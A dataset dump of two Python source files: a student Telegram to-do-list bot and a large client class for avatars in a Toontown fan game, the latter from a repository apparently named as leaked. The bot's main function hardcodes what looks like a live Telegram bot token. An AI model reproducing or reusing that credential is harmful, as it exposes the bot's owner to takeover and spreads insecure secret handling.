authors: ["[email protected]"] | author: ""

Row 3
blob_id: ad65d58afad4706819ae377f348ce126c1e23d7b
directory_id: 1a59761698398fbaa4de3640ba39ed44fbee3dc6
path: /exercise1.py
content_id: d2592530b7a7f5d638d3b9ea663c098567ce8c1a
detected_licenses: [] | license_type: no_license | repo_name: Michelangelo98/python-lab3
snapshot_id: 6a5fb1a045e653beaee59c33c9c1f6c212dac38f
revision_id: 41fcd5532563ded86937c6a00c80dd929d217532
branch_name: refs/heads/master | visit_date: 2020-07-25T09:31:51.022805 | revision_date: 2019-09-15T16:37:18 | committer_date: 2019-09-15T16:37:18
github_id: 208,246,559 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: 2019-09-13T10:56:12 | gha_created_at: 2019-09-13T10:56:10 | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 3,314 | extension: py
content:
from telegram.ext import Updater,CommandHandler,MessageHandler,Filters
import telegram
from sys import argv
def start(bot, update):
update.message.reply_text("Hello!")
def show_all_task(bot,update) :
file_in = open(argv[1])
todo_list = file_in.read().splitlines()
file_in.close()
if todo_list == [""] or todo_list == [] :
update.message.reply_text("Nothing to do, here!")
else:
update.message.reply_text(str(todo_list))
def new_task(bot,update,args) :
file_in = open(argv[1])
todo_list = file_in.read().splitlines()
file_in.close()
to_add = " ".join(args)
if to_add in todo_list :
update.message.reply_text("The task was already present")
return
file_out = open(argv[1],'a')
file_out.write(to_add + "\n")
file_out.close()
update.message.reply_text("The new task was succesfully added")
def remove_task(bot,update,args) :
file_in = open(argv[1])
todo_list = file_in.read().splitlines()
file_in.close()
file_out = open(argv[1],"w")
to_remove = " ".join(args)
print(to_remove)
if to_remove in todo_list :
todo_list.remove(to_remove)
update.message.reply_text("The task was succesfully removed")
else :
update.message.reply_text("The task was not found")
for task in todo_list:
file_out.write(task + "\n")
file_out.close()
def remove_all_task(bot,update,args) :
file_task = open(argv[1])
todo_list = file_task.read().splitlines()
file_task.close()
to_remove = " ".join(args)
remove_list = []
# build a separate remove_list so we do not modify todo_list while iterating over it (avoids an "out of range")
for action in todo_list:
if action.count(to_remove) != 0:
remove_list.append(action)
if remove_list == []:
update.message.reply_text("The task was not found")
else:
for task in remove_list:
todo_list.remove(task)
update.message.reply_text("Task removed: ")
update.message.reply_text(remove_list)
file_task = open(argv[1], "w")
for task in todo_list:
file_task.write(task + "\n")
file_task.close()
def error(bot,update) :
update.message.reply_text("This bot answer only commands")
def main():
'''
Manages a task list implemented as a Telegram bot.
:return:
'''
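# How the script is launched (the file name is hypothetical): python exercise1.py todo.txt
# argv[1] is the text file holding one task per line; the handlers above read and rewrite it.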
updater = Updater("718524122:AAF9wHSx1_L2nDelEAqH72-hOUqeJXWaq5M")
dispatcher = updater.dispatcher
start_task_handler = CommandHandler("start", start)
dispatcher.add_handler(start_task_handler)
show_task_handler = CommandHandler("showTasks",show_all_task)
dispatcher.add_handler(show_task_handler)
new_task_handler = CommandHandler("newTask",new_task,pass_args=True)
dispatcher.add_handler(new_task_handler)
remove_task_handler = CommandHandler("removeTask", remove_task, pass_args=True)
dispatcher.add_handler(remove_task_handler)
remove_all_task_handler = CommandHandler("removeAllTask", remove_all_task, pass_args=True)
dispatcher.add_handler(remove_all_task_handler)
error_task_handler = MessageHandler(Filters.text,error)
dispatcher.add_handler(error_task_handler)
updater.start_polling()
updater.idle()
if __name__ == '__main__':
main()
authors: ["[email protected]"] | author: ""

Row 4
blob_id: 2512edb155a767f6b7f93f15c00b755dc45ef923
directory_id: 8e69eee9b474587925e22413717eb82e4b024360
path: /v1.0.0.test/toontown/toon/DistributedToon.py
content_id: d9f2c0b0c6e00991934003b88c5ad0845ba6deeb
detected_licenses: ["MIT"] | license_type: permissive | repo_name: TTOFFLINE-LEAK/ttoffline
snapshot_id: afaef613c36dc3b70514ccee7030ba73c3b5045b
revision_id: bb0e91704a755d34983e94288d50288e46b68380
branch_name: refs/heads/master | visit_date: 2020-06-12T15:41:59.411795 | revision_date: 2020-04-17T08:22:55 | committer_date: 2020-04-17T08:22:55
github_id: 194,348,185 | star_events_count: 5 | fork_events_count: 4
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 139,568 | extension: py
content:
from subprocess import Popen
import sys
from panda3d.core import *
from libotp import *
from toontown.toonbase.ToontownGlobals import *
from direct.actor import Actor
from direct.distributed.ClockDelta import *
from direct.interval.IntervalGlobal import *
from otp.otpbase import OTPGlobals
from toontown.toonbase import ToontownGlobals
from direct.directnotify import DirectNotifyGlobal
from otp.avatar import DistributedPlayer
from otp.avatar import Avatar, DistributedAvatar
from otp.speedchat import SCDecoders
from otp.chat import TalkAssistant
import Toon
from direct.task.Task import Task
from direct.distributed import DistributedSmoothNode
from direct.distributed import DistributedObject
from direct.fsm import ClassicFSM
from toontown.hood import ZoneUtil
from toontown.distributed import DelayDelete
from toontown.distributed.DelayDeletable import DelayDeletable
from direct.showbase import PythonUtil
from toontown.catalog import CatalogItemList
from toontown.catalog import CatalogItem
import TTEmote
from toontown.shtiker.OptionsPage import speedChatStyles
from toontown.fishing import FishCollection
from toontown.fishing import FishTank
from toontown.suit import SuitDNA
from toontown.coghq import CogDisguiseGlobals
from toontown.toonbase import TTLocalizer
import Experience, InventoryNew
from toontown.speedchat import TTSCDecoders
from toontown.chat import ToonChatGarbler
from toontown.chat import ResistanceChat
from direct.distributed.MsgTypes import *
from toontown.effects.ScavengerHuntEffects import *
from toontown.estate import FlowerCollection
from toontown.estate import FlowerBasket
from toontown.estate import GardenGlobals
from toontown.estate import DistributedGagTree
from toontown.golf import GolfGlobals
from toontown.parties.PartyGlobals import InviteStatus, PartyStatus
from toontown.parties.PartyInfo import PartyInfo
from toontown.parties.InviteInfo import InviteInfo
from toontown.parties.PartyReplyInfo import PartyReplyInfoBase
from toontown.parties.SimpleMailBase import SimpleMailBase
from toontown.parties import PartyGlobals
from toontown.friends import FriendHandle
import time, operator
from direct.interval.IntervalGlobal import Sequence, Wait, Func, Parallel, SoundInterval
from toontown.distributed import DelayDelete
from otp.otpbase import OTPLocalizer
from direct.showbase.InputStateGlobal import inputState
from toontown.avatar import ToontownAvatarUtils
from toontown.toon import NPCToons
from toontown.battle.BattleProps import globalPropPool
from toontown.char import CharDNA
import random, copy, webbrowser
if base.wantKarts:
from toontown.racing.KartDNA import *
class DistributedToon(DistributedPlayer.DistributedPlayer, Toon.Toon, DistributedSmoothNode.DistributedSmoothNode, DelayDeletable):
notify = DirectNotifyGlobal.directNotify.newCategory('DistributedToon')
partyNotify = DirectNotifyGlobal.directNotify.newCategory('DistributedToon_Party')
chatGarbler = ToonChatGarbler.ToonChatGarbler()
gmNameTag = None
def __init__(self, cr, bFake=False):
try:
self.DistributedToon_initialized
return
except:
self.DistributedToon_initialized = 1
DistributedPlayer.DistributedPlayer.__init__(self, cr)
Toon.Toon.__init__(self)
DistributedSmoothNode.DistributedSmoothNode.__init__(self, cr)
self.bFake = bFake
self.kart = None
self._isGM = False
self._gmType = None
self.trophyScore = 0
self.trophyStar = None
self.trophyStarSpeed = 0
self.safeZonesVisited = []
self.NPCFriendsDict = {}
self.earnedExperience = None
self.track = None
self.effect = None
self.maxCarry = 0
self.disguisePageFlag = 0
self.sosPageFlag = 0
self.disguisePage = None
self.sosPage = None
self.gardenPage = None
self.cogTypes = [0,
0,
0,
0]
self.cogLevels = [0,
0,
0,
0]
self.cogParts = [0,
0,
0,
0]
self.cogMerits = [0,
0,
0,
0]
self.savedCheesyEffect = CENormal
self.savedCheesyHoodId = 0
self.savedCheesyExpireTime = 0
if hasattr(base, 'wantPets') and base.wantPets:
self.petTrickPhrases = []
self.petDNA = None
self.customMessages = []
self.resistanceMessages = []
self.cogSummonsEarned = []
self.catalogNotify = ToontownGlobals.NoItems
self.mailboxNotify = ToontownGlobals.NoItems
self.simpleMailNotify = ToontownGlobals.NoItems
self.inviteMailNotify = ToontownGlobals.NoItems
self.catalogScheduleCurrentWeek = 0
self.catalogScheduleNextTime = 0
self.monthlyCatalog = CatalogItemList.CatalogItemList()
self.weeklyCatalog = CatalogItemList.CatalogItemList()
self.backCatalog = CatalogItemList.CatalogItemList()
self.onOrder = CatalogItemList.CatalogItemList(store=CatalogItem.Customization | CatalogItem.DeliveryDate)
self.onGiftOrder = CatalogItemList.CatalogItemList(store=CatalogItem.Customization | CatalogItem.DeliveryDate)
self.mailboxContents = CatalogItemList.CatalogItemList(store=CatalogItem.Customization)
self.deliveryboxContentsContents = CatalogItemList.CatalogItemList(store=CatalogItem.Customization | CatalogItem.GiftTag)
self.awardMailboxContents = CatalogItemList.CatalogItemList(store=CatalogItem.Customization)
self.onAwardOrder = CatalogItemList.CatalogItemList(store=CatalogItem.Customization | CatalogItem.DeliveryDate)
self.splash = None
self.tossTrack = None
self.pieTracks = {}
self.splatTracks = {}
self.lastTossedPie = 0
self.clothesTopsList = []
self.clothesBottomsList = []
self.hatList = []
self.glassesList = []
self.backpackList = []
self.shoesList = []
self.tunnelTrack = None
self.tunnelPivotPos = [-14, -6, 0]
self.tunnelCenterOffset = 9.0
self.tunnelCenterInfluence = 0.6
self.pivotAngle = 135
self.posIndex = 0
self.houseId = 0
self.money = 0
self.bankMoney = 0
self.maxMoney = 0
self.maxBankMoney = 0
self.emblems = [0, 0]
self.maxNPCFriends = 16
self.petId = 0
self.bPetTutorialDone = False
self.bFishBingoTutorialDone = False
self.bFishBingoMarkTutorialDone = False
self.accessories = []
if base.wantKarts:
self.kartDNA = [
-1] * getNumFields()
self.flowerCollection = None
self.shovel = 0
self.shovelSkill = 0
self.shovelModel = None
self.wateringCan = 0
self.wateringCanSkill = 0
self.wateringCanModel = None
self.gardenSpecials = []
self.unlimitedSwing = 0
self.soundSequenceList = []
self.boardingParty = None
self.__currentDialogue = None
self.mail = None
self.invites = []
self.hostedParties = []
self.partiesInvitedTo = []
self.partyReplyInfoBases = []
self.gmState = 0
self.gmNameTagEnabled = 0
self.gmNameTagColor = 'whiteGM'
self.gmNameTagString = ''
self._lastZombieContext = None
self.carActive = False
self.carInterest = None
self.activeIntervals = {}
self.locked = False
self.muted = False
self.transitioning = False
self.cogIndex = -1
self.immortalMode = False
self.unlimitedGags = False
self.instaKill = False
self.cage = None
self.cageCameraNode = None
self.unlocks = []
return
def disable(self):
for soundSequence in self.soundSequenceList:
soundSequence.finish()
self.soundSequenceList = []
self._stopZombieCheck()
if self.boardingParty:
self.boardingParty.demandDrop()
self.boardingParty = None
self.carActive = False
self.updateCarActive()
self.ignore('clientCleanup')
self.stopAnimations()
self.clearCheesyEffect()
self.stopBlink()
self.stopSmooth()
self.stopLookAroundNow()
self.setGhostMode(0)
if self.track != None:
self.track.finish()
DelayDelete.cleanupDelayDeletes(self.track)
self.track = None
if self.effect != None:
self.effect.destroy()
self.effect = None
if self.splash != None:
self.splash.destroy()
self.splash = None
if self.emote != None:
self.emote.finish()
self.emote = None
self.cleanupPies()
if self.isDisguised:
self.takeOffSuit()
if self.tunnelTrack:
self.tunnelTrack.finish()
self.tunnelTrack = None
self.setTrophyScore(0)
self.removeGMIcon()
self.cleanupIntervals()
if self.doId in self.cr.toons:
del self.cr.toons[self.doId]
if self.cage:
self.cage.removeNode()
if self.cageCameraNode:
self.cageCameraNode.removeNode()
DistributedPlayer.DistributedPlayer.disable(self)
return
def delete(self):
try:
self.DistributedToon_deleted
except:
self.DistributedToon_deleted = 1
del self.safeZonesVisited
DistributedPlayer.DistributedPlayer.delete(self)
Toon.Toon.delete(self)
DistributedSmoothNode.DistributedSmoothNode.delete(self)
def generate(self):
DistributedPlayer.DistributedPlayer.generate(self)
DistributedSmoothNode.DistributedSmoothNode.generate(self)
self.cr.toons[self.doId] = self
if base.cr.trophyManager != None:
base.cr.trophyManager.d_requestTrophyScore()
self.startBlink()
self.startSmooth()
self.accept('clientCleanup', self._handleClientCleanup)
return
def announceGenerate(self):
DistributedPlayer.DistributedPlayer.announceGenerate(self)
if self.animFSM.getCurrentState().getName() == 'off':
self.setAnimState('neutral')
self._startZombieCheck()
self.updateCarActive()
def _handleClientCleanup(self):
if self.track != None:
DelayDelete.cleanupDelayDeletes(self.track)
return
def setDNAString(self, dnaString):
Toon.Toon.setDNAString(self, dnaString)
base.cr.discordManager.setSmallImage(base.cr.discordManager.getSmallImage())
def setDNA(self, dna):
if base.cr.newsManager:
if base.cr.newsManager.isHolidayRunning(ToontownGlobals.SPOOKY_BLACK_CAT):
black = 26
heads = ['cls',
'css',
'csl',
'cll']
dna.setTemporary(random.choice(heads), black, black, black)
else:
dna.restoreTemporary(self.style)
oldHat = self.getHat()
oldGlasses = self.getGlasses()
oldBackpack = self.getBackpack()
oldShoes = self.getShoes()
self.setHat(0, 0, 0)
self.setGlasses(0, 0, 0)
self.setBackpack(0, 0, 0)
self.setShoes(0, 0, 0)
Toon.Toon.setDNA(self, dna)
self.setHat(*oldHat)
self.setGlasses(*oldGlasses)
self.setBackpack(*oldBackpack)
self.setShoes(*oldShoes)
def setMagicDNA(self, hp):
self.sendUpdate('setMagicDNA', [hp])
def setMagicHeadAccessories(self, h1, h2, g1, g2):
self.sendUpdate('setMagicHeadAccessories', [h1, h2, g1, g2])
def setMagicBodyAccessories(self, b1, b2, s1, s2):
self.sendUpdate('setMagicBodyAccessories', [b1, b2, s1, s2])
def setHat(self, idx, textureIdx, colorIdx):
Toon.Toon.setHat(self, idx, textureIdx, colorIdx)
def setGlasses(self, idx, textureIdx, colorIdx):
Toon.Toon.setGlasses(self, idx, textureIdx, colorIdx)
def setBackpack(self, idx, textureIdx, colorIdx):
Toon.Toon.setBackpack(self, idx, textureIdx, colorIdx)
def setShoes(self, idx, textureIdx, colorIdx):
Toon.Toon.setShoes(self, idx, textureIdx, colorIdx)
def setGM(self, type):
wasGM = self._isGM
self._isGM = type != 0
self._gmType = None
if self._isGM:
self._gmType = type - 1
if self._isGM != wasGM:
self._handleGMName()
return
def setExperience(self, experience):
self.experience = Experience.Experience(experience, self)
if self.inventory:
self.inventory.updateGUI()
def setInventory(self, inventoryNetString):
if not self.inventory:
self.inventory = InventoryNew.InventoryNew(self, inventoryNetString)
self.inventory.updateInvString(inventoryNetString)
def setLastHood(self, lastHood):
self.lastHood = lastHood
def setBattleId(self, battleId):
self.battleId = battleId
messenger.send('ToonBattleIdUpdate', [self.doId])
def b_setSCToontask(self, taskId, toNpcId, toonProgress, msgIndex):
self.setSCToontask(taskId, toNpcId, toonProgress, msgIndex)
self.d_setSCToontask(taskId, toNpcId, toonProgress, msgIndex)
return
def d_setSCToontask(self, taskId, toNpcId, toonProgress, msgIndex):
messenger.send('wakeup')
self.sendUpdate('setSCToontask', [taskId,
toNpcId,
toonProgress,
msgIndex])
def setSCToontask(self, taskId, toNpcId, toonProgress, msgIndex):
if self.doId in base.localAvatar.ignoreList:
return
chatString = TTSCDecoders.decodeTTSCToontaskMsg(taskId, toNpcId, toonProgress, msgIndex)
if chatString:
self.setChatAbsolute(chatString, CFSpeech | CFQuicktalker | CFTimeout)
def b_setSCSinging(self, msgIndex):
self.setSCSinging(msgIndex)
self.d_setSCSinging(msgIndex)
return
def d_setSCSinging(self, msgIndex):
messenger.send('wakeup')
self.sendUpdate('setSCSinging', [msgIndex])
def sendLogSuspiciousEvent(self, msg):
localAvatar.sendUpdate('logSuspiciousEvent', ['%s for %s' % (msg, self.doId)])
def setSCSinging(self, msgIndex):
self.sendUpdate('logSuspiciousEvent', ['invalid msgIndex in setSCSinging: %s from %s' % (msgIndex, self.doId)])
def d_reqSCResistance(self, msgIndex):
messenger.send('wakeup')
nearbyPlayers = self.getNearbyPlayers(ResistanceChat.EFFECT_RADIUS)
self.sendUpdate('reqSCResistance', [msgIndex, nearbyPlayers])
def getNearbyPlayers(self, radius, includeSelf=True):
nearbyToons = []
toonIds = self.cr.getObjectsOfExactClass(DistributedToon)
for toonId, toon in toonIds.items():
if toon is not self:
dist = toon.getDistance(self)
if dist < radius:
nearbyToons.append(toonId)
if includeSelf:
nearbyToons.append(self.doId)
return nearbyToons
def setSCResistance(self, msgIndex, nearbyToons=[]):
chatString = TTSCDecoders.decodeTTSCResistanceMsg(msgIndex)
if chatString:
self.setChatAbsolute(chatString, CFSpeech | CFTimeout)
ResistanceChat.doEffect(msgIndex, self, nearbyToons)
def d_battleSOS(self, requesterId, sendToId=None):
if not base.cr.isFriend(sendToId):
return
self.sendUpdate('battleSOS', [requesterId], sendToId)
def battleSOS(self, requesterId):
if not base.cr.isFriend(requesterId):
return
else:
avatar = base.cr.identifyAvatar(requesterId)
if isinstance(avatar, DistributedToon) or isinstance(avatar, FriendHandle.FriendHandle):
self.setSystemMessage(requesterId, TTLocalizer.MovieSOSWhisperHelp % avatar.getName(), whisperType=WhisperPopup.WTBattleSOS)
elif avatar is not None:
self.notify.warning('got battleSOS from non-toon %s' % requesterId)
return
def getDialogueArray(self, *args):
return Toon.Toon.getDialogueArray(self, *args)
def setDefaultShard(self, shard):
self.defaultShard = shard
def setDefaultZone(self, zoneId):
if zoneId >= 30000 and zoneId < 40000:
zoneId = zoneId + 2000
try:
hoodPhase = base.cr.hoodMgr.getPhaseFromHood(zoneId)
except:
self.defaultZone = ToontownCentral
return
if ZoneUtil.getCanonicalHoodId(zoneId) == FunnyFarm:
self.defaultZone = ToontownCentral
return
if not base.cr.isPaid() or launcher and not launcher.getPhaseComplete(hoodPhase):
self.defaultZone = ToontownCentral
else:
self.defaultZone = zoneId
def setShtickerBook(self, string):
pass
def setAsGM(self, state):
self.notify.debug('Setting GM State: %s' % state)
DistributedPlayer.DistributedPlayer.setAsGM(self, state)
def d_updateGMNameTag(self):
self.refreshName()
def updateGMNameTag(self, tagString, color, state):
try:
unicode(tagString, 'utf-8')
except UnicodeDecodeError:
self.sendUpdate('logSuspiciousEvent', ['invalid GM name tag: %s from %s' % (tagString, self.doId)])
return
def refreshName(self):
return
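# NOTE: the early return above makes the GM nametag refresh code below unreachable (feature effectively disabled).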
self.notify.debug('Refreshing GM Nametag String: %s Color: %s State: %s' % (self.gmNameTagString, self.gmNameTagColor, self.gmNameTagEnabled))
if hasattr(self, 'nametag') and self.gmNameTagEnabled:
self.setDisplayName(self.gmNameTagString)
self.setName(self.gmNameTagString)
self.trophyStar1 = loader.loadModel('models/misc/smiley')
self.trophyStar1.reparentTo(self.nametag.getNameIcon())
self.trophyStar1.setScale(1)
self.trophyStar1.setZ(2.25)
self.trophyStar1.setColor(Vec4(0.75, 0.75, 0.75, 0.75))
self.trophyStar1.setTransparency(1)
self.trophyStarSpeed = 15
else:
taskMgr.add(self.__refreshNameCallBack, self.uniqueName('refreshNameCallBack'))
def __starSpin1(self, task):
now = globalClock.getFrameTime()
r = now * 90 % 360.0
self.trophyStar1.setH(r)
return Task.cont
def __refreshNameCallBack(self, task):
if hasattr(self, 'nametag') and self.nametag.getName() != '':
self.refreshName()
return Task.done
else:
return Task.cont
def setTalk(self, fromAV, fromAC, avatarName, chat, mods, flags, raw):
if base.cr.avatarFriendsManager.checkIgnored(fromAV):
self.d_setWhisperIgnored(fromAV)
return
else:
if fromAV in self.ignoreList:
self.d_setWhisperIgnored(fromAV)
return
if base.config.GetBool('want-sleep-reply-on-regular-chat', 0):
if base.localAvatar.sleepFlag == 1:
self.sendUpdate('setSleepAutoReply', [base.localAvatar.doId], fromAV)
newText, scrubbed = self.scrubTalk(chat, mods, raw)
self.displayTalk(newText)
base.talkAssistant.receiveOpenTalk(fromAV, avatarName, fromAC, None, newText)
return
def isAvFriend(self, avId):
return base.cr.isFriend(avId) or base.cr.playerFriendsManager.isAvatarOwnerPlayerFriend(avId)
def setTalkWhisper(self, fromAV, fromAC, avatarName, chat, mods, flags, raw):
if not localAvatar.acceptingNonFriendWhispers:
if not self.isAvFriend(fromAV):
return
if base.cr.avatarFriendsManager.checkIgnored(fromAV):
self.d_setWhisperIgnored(fromAV)
return
else:
if fromAV in self.ignoreList:
self.d_setWhisperIgnored(fromAV)
return
if base.config.GetBool('ignore-whispers', 0):
return
if base.localAvatar.sleepFlag == 1:
if not base.cr.identifyAvatar(fromAV) == base.localAvatar:
self.sendUpdate('setSleepAutoReply', [base.localAvatar.doId], fromAV)
newText, scrubbed = self.scrubTalk(chat, mods, raw)
self.displayTalkWhisper(fromAV, avatarName, chat, mods, raw)
base.talkAssistant.receiveWhisperTalk(fromAV, avatarName, fromAC, None, self.doId, self.getName(), newText)
return
def setSleepAutoReply(self, fromId):
pass
def _isValidWhisperSource(self, source):
return isinstance(source, FriendHandle.FriendHandle) or isinstance(source, DistributedToon)
def setWhisperSCEmoteFrom(self, fromId, emoteId):
handle = base.cr.identifyFriend(fromId)
if handle == None:
return
else:
if not self._isValidWhisperSource(handle):
self.notify.warning('setWhisperSCEmoteFrom non-toon %s' % fromId)
return
if not localAvatar.acceptingNonFriendWhispers:
if not self.isAvFriend(fromId):
return
if base.cr.avatarFriendsManager.checkIgnored(fromId):
self.d_setWhisperIgnored(fromId)
return
if base.localAvatar.sleepFlag == 1:
if not base.cr.identifyAvatar(fromId) == base.localAvatar:
self.sendUpdate('setSleepAutoReply', [base.localAvatar.doId], fromId)
chatString = SCDecoders.decodeSCEmoteWhisperMsg(emoteId, handle.getName())
if chatString:
self.displayWhisper(fromId, chatString, WhisperPopup.WTEmote)
base.talkAssistant.receiveAvatarWhisperSpeedChat(TalkAssistant.SPEEDCHAT_EMOTE, emoteId, fromId)
return
def setWhisperSCFrom(self, fromId, msgIndex):
handle = base.cr.identifyFriend(fromId)
if handle == None:
return
else:
if not self._isValidWhisperSource(handle):
self.notify.warning('setWhisperSCFrom non-toon %s' % fromId)
return
if not localAvatar.acceptingNonFriendWhispers:
if not self.isAvFriend(fromId):
return
if base.cr.avatarFriendsManager.checkIgnored(fromId):
self.d_setWhisperIgnored(fromId)
return
if fromId in self.ignoreList:
self.d_setWhisperIgnored(fromId)
return
if base.localAvatar.sleepFlag == 1:
if not base.cr.identifyAvatar(fromId) == base.localAvatar:
self.sendUpdate('setSleepAutoReply', [base.localAvatar.doId], fromId)
chatString = SCDecoders.decodeSCStaticTextMsg(msgIndex)
if chatString:
self.displayWhisper(fromId, chatString, WhisperPopup.WTQuickTalker)
base.talkAssistant.receiveAvatarWhisperSpeedChat(TalkAssistant.SPEEDCHAT_NORMAL, msgIndex, fromId)
return
def setWhisperSCCustomFrom(self, fromId, msgIndex):
handle = base.cr.identifyFriend(fromId)
if handle == None:
return
else:
if not localAvatar.acceptingNonFriendWhispers:
if not self.isAvFriend(fromId):
return
return DistributedPlayer.DistributedPlayer.setWhisperSCCustomFrom(self, fromId, msgIndex)
def whisperSCToontaskTo(self, taskId, toNpcId, toonProgress, msgIndex, sendToId):
messenger.send('wakeup')
self.sendUpdate('setWhisperSCToontaskFrom', [self.doId,
taskId,
toNpcId,
toonProgress,
msgIndex], sendToId)
def setWhisperSCToontaskFrom(self, fromId, taskId, toNpcId, toonProgress, msgIndex):
sender = base.cr.identifyFriend(fromId)
if sender == None:
return
else:
if not localAvatar.acceptingNonFriendWhispers:
if not self.isAvFriend(fromId):
return
if fromId in self.ignoreList:
self.d_setWhisperIgnored(fromId)
chatString = TTSCDecoders.decodeTTSCToontaskMsg(taskId, toNpcId, toonProgress, msgIndex)
if chatString:
self.displayWhisper(fromId, chatString, WhisperPopup.WTQuickTalker)
return
def setMaxNPCFriends(self, max):
max &= 32767
if max != self.maxNPCFriends:
self.maxNPCFriends = max
messenger.send(self.uniqueName('maxNPCFriendsChange'))
else:
self.maxNPCFriends = max
def getMaxNPCFriends(self):
return self.maxNPCFriends
def getNPCFriendsDict(self):
return self.NPCFriendsDict
def setNPCFriendsDict(self, NPCFriendsList):
NPCFriendsDict = {}
for friendPair in NPCFriendsList:
npcFriends = NPCToons.loadCards(returnDict=True)
if friendPair[0] not in npcFriends:
continue
NPCFriendsDict[friendPair[0]] = friendPair[1]
self.NPCFriendsDict = NPCFriendsDict
def setMaxAccessories(self, max):
self.maxAccessories = max
def getMaxAccessories(self):
return self.maxAccessories
def setHatList(self, clothesList):
self.hatList = clothesList
def getHatList(self):
return self.hatList
def setGlassesList(self, clothesList):
self.glassesList = clothesList
def getGlassesList(self):
return self.glassesList
def setBackpackList(self, clothesList):
self.backpackList = clothesList
def getBackpackList(self):
return self.backpackList
def setShoesList(self, clothesList):
self.shoesList = clothesList
def getShoesList(self):
return self.shoesList
def isTrunkFull(self, extraAccessories=0):
numAccessories = (len(self.hatList) + len(self.glassesList) + len(self.backpackList) + len(self.shoesList)) / 3
return numAccessories + extraAccessories >= self.maxAccessories
def setMaxClothes(self, max):
self.maxClothes = max
def getMaxClothes(self):
return self.maxClothes
def getClothesTopsList(self):
return self.clothesTopsList
def setClothesTopsList(self, clothesList):
self.clothesTopsList = clothesList
def getClothesBottomsList(self):
return self.clothesBottomsList
def setClothesBottomsList(self, clothesList):
self.clothesBottomsList = clothesList
def catalogGenClothes(self, avId):
if avId == self.doId:
self.generateToonClothes()
self.loop('neutral')
def catalogGenAccessories(self, avId):
if avId == self.doId:
self.generateToonAccessories()
self.loop('neutral')
def isClosetFull(self, extraClothes=0):
numClothes = len(self.clothesTopsList) / 4 + len(self.clothesBottomsList) / 2
return numClothes + extraClothes >= self.maxClothes
def setMaxHp(self, hitPoints):
DistributedPlayer.DistributedPlayer.setMaxHp(self, hitPoints)
if self.inventory:
self.inventory.updateGUI()
def setHp(self, hp):
DistributedPlayer.DistributedPlayer.setHp(self, hp)
if self.isDisguised:
self.suit.currHP = self.hp
self.suit.maxHP = self.maxHp
if self.maxHp == self.hp:
self.suit.corpMedallion.show()
self.suit.healthBar.hide()
else:
self.suit.corpMedallion.hide()
self.suit.healthBar.show()
self.suit.updateHealthBar(self.hp, True, True)
def died(self):
messenger.send(self.uniqueName('died'))
if self.isLocal():
target_sz = ZoneUtil.getSafeZoneId(self.defaultZone)
place = self.cr.playGame.getPlace()
if place and place.fsm:
place.fsm.request('died', [
{'loader': ZoneUtil.getLoaderName(target_sz), 'where': ZoneUtil.getWhereName(target_sz, 1),
'how': 'teleportIn',
'hoodId': target_sz,
'zoneId': target_sz,
'shardId': None,
'avId': -1,
'battle': 1}])
return
def setInterface(self, string):
pass
def setZonesVisited(self, hoods):
self.safeZonesVisited = hoods
def setHoodsVisited(self, hoods):
self.hoodsVisited = hoods
if ToontownGlobals.SellbotHQ in hoods or ToontownGlobals.CashbotHQ in hoods or ToontownGlobals.LawbotHQ in hoods:
self.setDisguisePageFlag(1)
def wrtReparentTo(self, parent):
DistributedSmoothNode.DistributedSmoothNode.wrtReparentTo(self, parent)
def setTutorialAck(self, tutorialAck):
self.tutorialAck = tutorialAck
def setEarnedExperience(self, earnedExp):
self.earnedExperience = earnedExp
def b_setTunnelIn(self, endX, tunnelOrigin):
timestamp = globalClockDelta.getFrameNetworkTime()
pos = tunnelOrigin.getPos(render)
h = tunnelOrigin.getH(render)
self.setTunnelIn(timestamp, endX, pos[0], pos[1], pos[2], h)
self.d_setTunnelIn(timestamp, endX, pos[0], pos[1], pos[2], h)
def d_setTunnelIn(self, timestamp, endX, x, y, z, h):
self.sendUpdate('setTunnelIn', [timestamp,
endX,
x,
y,
z,
h])
def setTunnelIn(self, timestamp, endX, x, y, z, h):
t = globalClockDelta.networkToLocalTime(timestamp)
self.handleTunnelIn(t, endX, x, y, z, h)
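    # Build the interval that brings the toon in through a tunnel: it swings
    # around a pivot node at the tunnel mouth, then walks straight out to the
    # tunnel exit position.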
def getTunnelInToonTrack(self, endX, tunnelOrigin):
pivotNode = tunnelOrigin.attachNewNode(self.uniqueName('pivotNode'))
pivotNode.setPos(*self.tunnelPivotPos)
pivotNode.setHpr(0, 0, 0)
pivotY = pivotNode.getY(tunnelOrigin)
endY = 5.0
straightLerpDur = abs(endY - pivotY) / ToonForwardSpeed
pivotDur = 2.0
pivotLerpDur = pivotDur * (90.0 / self.pivotAngle)
self.reparentTo(pivotNode)
self.setPos(0, 0, 0)
self.setX(tunnelOrigin, endX)
targetX = self.getX()
self.setX(self.tunnelCenterOffset + (targetX - self.tunnelCenterOffset) * (1.0 - self.tunnelCenterInfluence))
self.setHpr(tunnelOrigin, 0, 0, 0)
pivotNode.setH(-self.pivotAngle)
return Sequence(Wait(0.8), Parallel(LerpHprInterval(pivotNode, pivotDur, hpr=Point3(0, 0, 0), name=self.uniqueName('tunnelInPivot')), Sequence(Wait(pivotDur - pivotLerpDur), LerpPosInterval(self, pivotLerpDur, pos=Point3(targetX, 0, 0), name=self.uniqueName('tunnelInPivotLerpPos')))), Func(self.wrtReparentTo, render), Func(pivotNode.removeNode), LerpPosInterval(self, straightLerpDur, pos=Point3(endX, endY, 0.1), other=tunnelOrigin, name=self.uniqueName('tunnelInStraightLerp')))
def handleTunnelIn(self, startTime, endX, x, y, z, h):
self.stopSmooth()
tunnelOrigin = render.attachNewNode('tunnelOrigin')
tunnelOrigin.setPosHpr(x, y, z, h, 0, 0)
self.tunnelTrack = Sequence(self.getTunnelInToonTrack(endX, tunnelOrigin), Func(tunnelOrigin.removeNode), Func(self.startSmooth))
tOffset = globalClock.getFrameTime() - (startTime + self.smoother.getDelay())
if tOffset < 0.0:
self.tunnelTrack = Sequence(Wait(-tOffset), self.tunnelTrack)
self.tunnelTrack.start()
else:
self.tunnelTrack.start(tOffset)
def b_setTunnelOut(self, startX, startY, tunnelOrigin):
timestamp = globalClockDelta.getFrameNetworkTime()
pos = tunnelOrigin.getPos(render)
h = tunnelOrigin.getH(render)
self.setTunnelOut(timestamp, startX, startY, pos[0], pos[1], pos[2], h)
self.d_setTunnelOut(timestamp, startX, startY, pos[0], pos[1], pos[2], h)
